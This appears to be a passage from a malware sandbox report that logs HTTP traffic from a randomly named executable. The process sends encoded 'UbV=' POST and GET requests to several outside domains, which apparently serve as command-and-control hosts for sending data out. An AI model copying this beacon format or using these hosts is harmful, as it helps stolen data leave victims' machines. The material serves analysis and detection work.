                            Data Raw: 55 62 56 3d 77 44 34 77 37 2f 32 54 55 4e 6e 4e 50 6f 59 72 44 4a 33 67 4f 6a 78 4a 6b 51 38 4b 51 69 44 69 47 64 35 36 2f 65 2f 64 66 66 7a 39 4e 31 65 32 61 68 76 65 4b 50 69 41 4f 66 58 67 6e 6d 62 76 61 45 4d 4d 32 58 4f 63 5a 50 50 7a 61 75 77 6a 77 50 77 77 31 65 47 79 70 52 54 76 39 31 71 51 63 32 7a 39 4b 70 59 42 65 39 4d 6c 39 64 6f 2b 65 42 6f 76 6c 62 2f 54 63 4f 5a 46 58 41 55 5a 45 31 43 6e 70 53 4b 38 69 41 6a 49 36 4b 5a 72 64 72 2f 43 4b 76 44 67 74 66 44 72 45 34 58 62 42 33 79 6f 70 62 30 4b 72 63 6f 6d 54 6c 2f 6d 5a 57 6d 56 62 32 59 72 41 72 70 55 56 69 53 75 44 41 3d 3d
                            Data Ascii: UbV=wD4w7/2TUNnNPoYrDJ3gOjxJkQ8KQiDiGd56/e/dffz9N1e2ahveKPiAOfXgnmbvaEMM2XOcZPPzauwjwPww1eGypRTv91qQc2z9KpYBe9Ml9do+eBovlb/TcOZFXAUZE1CnpSK8iAjI6KZrdr/CKvDgtfDrE4XbB3yopb0KrcomTl/mZWmVb2YrArpUViSuDA==
                            Jul 16, 2024 07:22:21.846611977 CEST | 479 | IN | HTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:22:21 GMT
                            Server: Apache
                            Content-Length: 315
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            6 | 192.168.2.4 | 49743 | 216.194.173.237 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:22:23.814245939 CEST | 672 | OUT | POST /6vu8/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.mysticriverpath.com
                            Origin: http://www.mysticriverpath.com
                            Referer: http://www.mysticriverpath.com/6vu8/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 77 44 34 77 37 2f 32 54 55 4e 6e 4e 50 4e 51 72 42 72 66 67 50 44 78 4f 72 77 38 4b 66 43 44 2b 47 64 46 36 2f 61 4f 41 65 74 58 39 4e 55 75 32 5a 6a 58 65 4e 50 69 41 46 2f 58 66 34 57 62 61 61 45 49 45 32 57 69 63 5a 50 62 7a 61 71 34 6a 77 34 46 6d 31 4f 47 77 38 68 54 68 6a 46 71 51 63 32 7a 39 4b 71 6b 2f 65 39 45 6c 36 74 59 2b 64 6a 51 67 73 37 2f 51 62 4f 5a 46 54 41 55 64 45 31 44 45 70 54 57 53 69 44 62 49 36 50 39 72 54 61 2f 44 42 76 44 63 79 76 43 47 49 49 69 55 59 46 75 6e 6a 36 45 74 74 65 45 77 62 44 75 38 49 6e 48 43 4a 32 38 59 64 73 67 67 59 68 76 6e 59 48 65 6f 74 4f 35 65 43 36 6f 33 50 58 33 46 36 65 44 6a 51 6f 38 3d
                            Data Ascii: UbV=wD4w7/2TUNnNPNQrBrfgPDxOrw8KfCD+GdF6/aOAetX9NUu2ZjXeNPiAF/Xf4WbaaEIE2WicZPbzaq4jw4Fm1OGw8hThjFqQc2z9Kqk/e9El6tY+djQgs7/QbOZFTAUdE1DEpTWSiDbI6P9rTa/DBvDcyvCGIIiUYFunj6EtteEwbDu8InHCJ28YdsggYhvnYHeotO5eC6o3PX3F6eDjQo8=
                            Jul 16, 2024 07:22:24.405503035 CEST | 479 | IN | HTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:22:24 GMT
                            Server: Apache
                            Content-Length: 315
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            7 | 192.168.2.4 | 49744 | 216.194.173.237 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:22:26.356976032 CEST | 10754 | OUT | POST /6vu8/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.mysticriverpath.com
                            Origin: http://www.mysticriverpath.com
                            Referer: http://www.mysticriverpath.com/6vu8/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 77 44 34 77 37 2f 32 54 55 4e 6e 4e 50 4e 51 72 42 72 66 67 50 44 78 4f 72 77 38 4b 66 43 44 2b 47 64 46 36 2f 61 4f 41 65 74 66 39 4e 6d 6d 32 5a 45 37 65 4d 50 69 41 49 66 58 6b 34 57 62 48 61 41 63 41 32 57 2f 6e 5a 4d 6a 7a 63 4e 34 6a 32 4a 46 6d 36 4f 47 77 6a 78 54 73 39 31 71 2f 63 32 6a 35 4b 71 30 2f 65 39 45 6c 36 75 41 2b 4b 68 6f 67 67 62 2f 54 63 4f 5a 5a 58 41 56 41 45 78 75 2f 70 51 36 73 69 7a 37 49 37 76 74 72 52 73 44 44 64 2f 44 65 78 76 43 65 49 49 2f 55 59 46 6a 57 6a 36 77 58 74 66 38 77 5a 79 4f 6d 55 54 62 38 57 51 39 43 4b 64 42 43 66 43 2f 30 52 58 6d 6b 72 4d 5a 56 61 70 4d 38 46 31 48 4f 76 4f 44 37 54 2b 7a 6c 35 71 62 78 53 43 71 68 6d 6c 57 6e 4f 32 4c 52 49 4a 6e 55 4f 4f 77 39 63 4a 71 47 71 33 41 38 49 66 63 4b 39 69 38 65 67 30 67 56 65 74 5a 4e 31 2f 6e 62 44 70 6f 67 58 2b 71 44 41 79 79 59 68 4a 49 75 6f 66 35 76 76 62 54 56 6a 74 55 30 6b 58 49 59 2f 44 6b 4a 34 68 70 31 7a 37 6b 33 4d 4b 42 4d 6c 50 55 2b 73 75 75 4f 56 71 50 73 53 6b 37 30 35 48 [TRUNCATED]
                            Data Ascii: UbV=wD4w7/2TUNnNPNQrBrfgPDxOrw8KfCD+GdF6/aOAetf9Nmm2ZE7eMPiAIfXk4WbHaAcA2W/nZMjzcN4j2JFm6OGwjxTs91q/c2j5Kq0/e9El6uA+Khoggb/TcOZZXAVAExu/pQ6siz7I7vtrRsDDd/DexvCeII/UYFjWj6wXtf8wZyOmUTb8WQ9CKdBCfC/0RXmkrMZVapM8F1HOvOD7T+zl5qbxSCqhmlWnO2LRIJnUOOw9cJqGq3A8IfcK9i8eg0gVetZN1/nbDpogX+qDAyyYhJIuof5vvbTVjtU0kXIY/DkJ4hp1z7k3MKBMlPU+suuOVqPsSk705HtKRJAT02P7B0mkz2ZDqVRgYkvG+nBKe8ujjm+g13CtcX/Oe1hYvBH6CSwgYs4iSpTYPkpQ/ACNdEx8NmgFxZxMimzs6ApCXj7b/6D6ot6DbA3PYio+K+3czsnFong4XnZH+IB96u2yyNWcW6fTAAA0NvrwHfYfIiTmDWSeboem3CWd7RQ8iliee7YeFbtdpidKqxifcLDPcdpKx0x0va+gWwJ8mp45Ztsp+X3pz7bvPw3WOixe7JyBoL9yE8gdOY29PLnqYgcM0cHn7/YRG9YC8wf3zzHytYByxJobShjZ+5cK5eOGqUhz0FbH51EfVHjRLbyUuRjoESNLKf6+FpgCMw7Up7eoCeUvRA4CgWkRHvyyILg+6ilTOj1U2SWL2T1tfCZ4joRF8MZ9DNzRjMR8/fD76ykUqW0nnkRMBR7ny/79mjiT9TNZUKU65t78SRXUyY4TMP/i0yLMWw8eVeZmXPx5nLV5FdDqK/2idoT2zORg9mNhmRFD0WrV0+qOxoeS5cy0ypK5/W/uJZz5fHAX614p7QqCXwqLdik5dHrvOHV8m4xN37McThHpq2rbJ2zmaLR8GjaHOLQIz8YTtqePAjP4daINS810+DcKKg52hUU/jWdh16lH00XwHBkkLdkSAJD9CoLmrKwl3OiAUxecz4BixPLENL1C [TRUNCATED]
                            Jul 16, 2024 07:22:26.963517904 CEST | 479 | IN | HTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:22:26 GMT
                            Server: Apache
                            Content-Length: 315
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            8 | 192.168.2.4 | 49745 | 216.194.173.237 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:22:28.906313896 CEST | 373 | OUT | GET /6vu8/?UbV=9BQQ4LaVGcGIAegoNYy4BANrrk0FTQnfEPkS9PLUef2OP02gFBPJINGmLbjvn2PiRjYvhByaYI3HRuE2zbw60OnBrR/0yXqwb0H4BL8PQO8YxsUyAjYVuYA=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.mysticriverpath.com
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:22:29.476762056 CEST | 479 | IN | HTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:22:29 GMT
                            Server: Apache
                            Content-Length: 315
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            9 | 192.168.2.4 | 49746 | 3.33.130.190 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:22:34.516191959 CEST | 631 | OUT | POST /f6em/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.bearclaw.bot
                            Origin: http://www.bearclaw.bot
                            Referer: http://www.bearclaw.bot/f6em/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 36 75 30 38 38 51 4c 43 32 63 44 51 75 63 36 70 78 4a 76 71 4f 4f 32 54 51 58 4e 4a 46 70 31 46 39 5a 45 66 4d 6f 58 66 4f 36 57 35 69 30 62 79 62 57 57 34 67 4f 5a 31 2f 36 37 75 51 6b 45 35 78 59 72 2b 43 48 56 65 50 4d 6d 4a 64 52 7a 57 73 65 59 4f 43 6f 65 44 38 48 51 44 7a 68 6a 55 30 42 71 71 58 32 52 6d 35 31 75 61 70 6a 6c 43 6f 54 75 79 47 63 2b 43 38 41 6b 44 4e 73 7a 48 62 2b 36 55 6b 50 76 36 76 4b 4c 4f 6e 75 55 75 53 68 62 43 65 4f 73 71 42 4a 78 53 67 4a 63 64 56 56 5a 72 43 56 56 4d 59 42 71 38 68 49 52 78 79 42 31 77 32 32 75 6a 77 76 48 58 67 63 6f 2f 33 77 3d 3d
                            Data Ascii: UbV=6u088QLC2cDQuc6pxJvqOO2TQXNJFp1F9ZEfMoXfO6W5i0bybWW4gOZ1/67uQkE5xYr+CHVePMmJdRzWseYOCoeD8HQDzhjU0BqqX2Rm51uapjlCoTuyGc+C8AkDNszHb+6UkPv6vKLOnuUuShbCeOsqBJxSgJcdVVZrCVVMYBq8hIRxyB1w22ujwvHXgco/3w==


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            10 | 192.168.2.4 | 49747 | 3.33.130.190 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:22:37.058175087 CEST | 651 | OUT | POST /f6em/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.bearclaw.bot
                            Origin: http://www.bearclaw.bot
                            Referer: http://www.bearclaw.bot/f6em/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 36 75 30 38 38 51 4c 43 32 63 44 51 76 2f 53 70 69 61 33 71 49 75 32 55 4f 48 4e 4a 4b 4a 31 4a 39 5a 49 66 4d 70 44 50 4f 4d 75 35 69 56 72 79 4a 6c 4f 34 74 75 5a 31 77 61 37 72 54 55 45 32 78 59 76 32 43 46 42 65 50 4d 69 4a 64 55 50 57 73 76 59 4a 41 34 65 4e 30 6e 51 42 74 52 6a 55 30 42 71 71 58 32 30 78 35 31 6d 61 71 51 39 43 6f 32 43 78 50 38 2b 42 73 51 6b 44 4a 73 7a 44 62 2b 36 32 6b 4f 6a 51 76 49 44 4f 6e 73 63 75 53 51 62 44 55 4f 73 6f 65 5a 77 42 6f 36 70 70 5a 46 73 38 44 33 31 33 58 6b 4f 77 74 75 41 72 6a 77 55 6e 6b 32 4b 51 74 6f 4f 6a 74 66 56 32 73 78 4d 7a 31 53 59 31 52 4d 6a 57 57 61 70 69 35 69 39 34 6f 30 67 3d
                            Data Ascii: UbV=6u088QLC2cDQv/Spia3qIu2UOHNJKJ1J9ZIfMpDPOMu5iVryJlO4tuZ1wa7rTUE2xYv2CFBePMiJdUPWsvYJA4eN0nQBtRjU0BqqX20x51maqQ9Co2CxP8+BsQkDJszDb+62kOjQvIDOnscuSQbDUOsoeZwBo6ppZFs8D313XkOwtuArjwUnk2KQtoOjtfV2sxMz1SY1RMjWWapi5i94o0g=


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            11 | 192.168.2.4 | 49748 | 3.33.130.190 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:22:39.591182947 CEST | 10733 | OUT | POST /f6em/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.bearclaw.bot
                            Origin: http://www.bearclaw.bot
                            Referer: http://www.bearclaw.bot/f6em/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 36 75 30 38 38 51 4c 43 32 63 44 51 76 2f 53 70 69 61 33 71 49 75 32 55 4f 48 4e 4a 4b 4a 31 4a 39 5a 49 66 4d 70 44 50 4f 4d 6d 35 69 44 2f 79 59 31 79 34 73 75 5a 31 35 36 37 71 54 55 45 52 78 63 37 79 43 46 39 6f 50 4f 71 4a 63 78 44 57 39 4c 30 4a 4a 34 65 4e 34 48 51 43 7a 68 69 4f 30 46 4f 6d 58 32 45 78 35 31 6d 61 71 57 35 43 71 6a 75 78 4e 38 2b 43 38 41 6b 48 4e 73 79 6b 62 2b 53 48 6b 4f 33 71 76 34 6a 4f 6e 4d 4d 75 42 43 44 44 59 4f 73 75 66 5a 78 47 6f 36 31 32 5a 46 77 77 44 7a 39 64 58 69 79 77 39 37 42 51 34 30 63 7a 35 30 43 33 2b 76 6e 45 32 34 6f 30 6c 47 45 6f 7a 42 4d 51 4e 66 66 48 64 4e 5a 6e 70 67 4e 41 30 45 67 38 50 36 77 79 2b 6c 48 61 38 61 47 65 65 76 48 71 4e 32 52 46 41 59 6b 56 6b 36 4f 5a 44 35 33 64 55 59 36 74 2b 4c 75 57 62 35 75 50 63 36 50 6f 4e 34 4d 42 74 47 78 63 6b 71 77 6f 6e 55 74 78 39 56 53 36 47 37 70 69 6b 37 78 6d 43 36 43 57 66 58 35 50 69 70 42 2b 61 46 32 6f 6f 79 62 45 79 30 57 43 38 6d 7a 4f 55 2f 63 6f 56 72 79 62 6a 71 75 37 66 31 [TRUNCATED]
                            Data Ascii: UbV= [TRUNCATED]


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            12 | 192.168.2.4 | 49749 | 3.33.130.190 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:22:42.658550024 CEST | 366 | OUT | GET /f6em/?UbV=3scc/l+m0dTfturexYmDD/ihdyc/GZ5DxLslLbTADZTZz0L4ImmnnfNh8/fEKVgbyf/SBi86BZffcRTKk/E5LLaY5QN8jxf/mVG9V1ZF+n+osgl4kzW2NMc=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.bearclaw.bot
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:22:43.121315956 CEST | 395 | IN | HTTP/1.1 200 OK
                            Server: openresty
                            Date: Tue, 16 Jul 2024 05:22:43 GMT
                            Content-Type: text/html
                            Content-Length: 255
                            Connection: close
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 55 62 56 3d 33 73 63 63 2f 6c 2b 6d 30 64 54 66 74 75 72 65 78 59 6d 44 44 2f 69 68 64 79 63 2f 47 5a 35 44 78 4c 73 6c 4c 62 54 41 44 5a 54 5a 7a 30 4c 34 49 6d 6d 6e 6e 66 4e 68 38 2f 66 45 4b 56 67 62 79 66 2f 53 42 69 38 36 42 5a 66 66 63 52 54 4b 6b 2f 45 35 4c 4c 61 59 35 51 4e 38 6a 78 66 2f 6d 56 47 39 56 31 5a 46 2b 6e 2b 6f 73 67 6c 34 6b 7a 57 32 4e 4d 63 3d 26 59 34 67 70 3d 6d 6c 6c 74 63 72 52 78 63 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UbV=3scc/l+m0dTfturexYmDD/ihdyc/GZ5DxLslLbTADZTZz0L4ImmnnfNh8/fEKVgbyf/SBi86BZffcRTKk/E5LLaY5QN8jxf/mVG9V1ZF+n+osgl4kzW2NMc=&Y4gp=mlltcrRxcL"}</script></head></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            13 | 192.168.2.4 | 49750 | 212.227.172.254 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:22:48.154267073 CEST | 649 | OUT | POST /rbwl/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.focusonsocials.com
                            Origin: http://www.focusonsocials.com
                            Referer: http://www.focusonsocials.com/rbwl/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 2f 46 4f 61 64 53 64 4d 58 76 50 4f 73 37 6d 33 65 78 67 54 7a 68 42 31 44 32 37 42 64 4c 4f 36 6a 44 6f 72 61 62 4a 2b 65 30 4c 64 35 4b 79 76 32 70 33 49 74 42 55 63 4e 33 56 39 66 78 47 47 59 79 61 58 49 6a 4b 43 64 4d 6e 37 7a 30 72 57 6d 4b 53 59 63 68 62 48 4f 71 36 4f 51 66 2b 46 38 43 6b 78 5a 77 44 47 47 77 6a 30 45 66 4f 68 4c 55 2b 65 37 6a 2f 48 2f 52 33 45 5a 34 49 70 64 57 73 33 47 65 65 64 62 6c 41 77 49 69 74 57 5a 71 56 42 57 44 6c 6d 30 49 55 47 2b 66 69 4a 35 69 41 61 58 4d 36 55 2b 67 41 4d 7a 4d 62 70 70 55 66 2b 2b 54 57 6f 48 62 78 34 50 64 6f 66 4c 67 3d 3d
                            Data Ascii: UbV=/FOadSdMXvPOs7m3exgTzhB1D27BdLO6jDorabJ+e0Ld5Kyv2p3ItBUcN3V9fxGGYyaXIjKCdMn7z0rWmKSYchbHOq6OQf+F8CkxZwDGGwj0EfOhLU+e7j/H/R3EZ4IpdWs3GeedblAwIitWZqVBWDlm0IUG+fiJ5iAaXM6U+gAMzMbppUf++TWoHbx4PdofLg==
                            Jul 16, 2024 07:22:48.798825026 CEST | 430 | IN | HTTP/1.1 301 Moved Permanently
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:22:48 GMT
                            Content-Type: text/html
                            Content-Length: 162
                            Connection: close
                            Location: https://www.focusonsocials.com/rbwl/
                            Expires: Tue, 16 Jul 2024 05:42:48 GMT
                            Cache-Control: max-age=1200
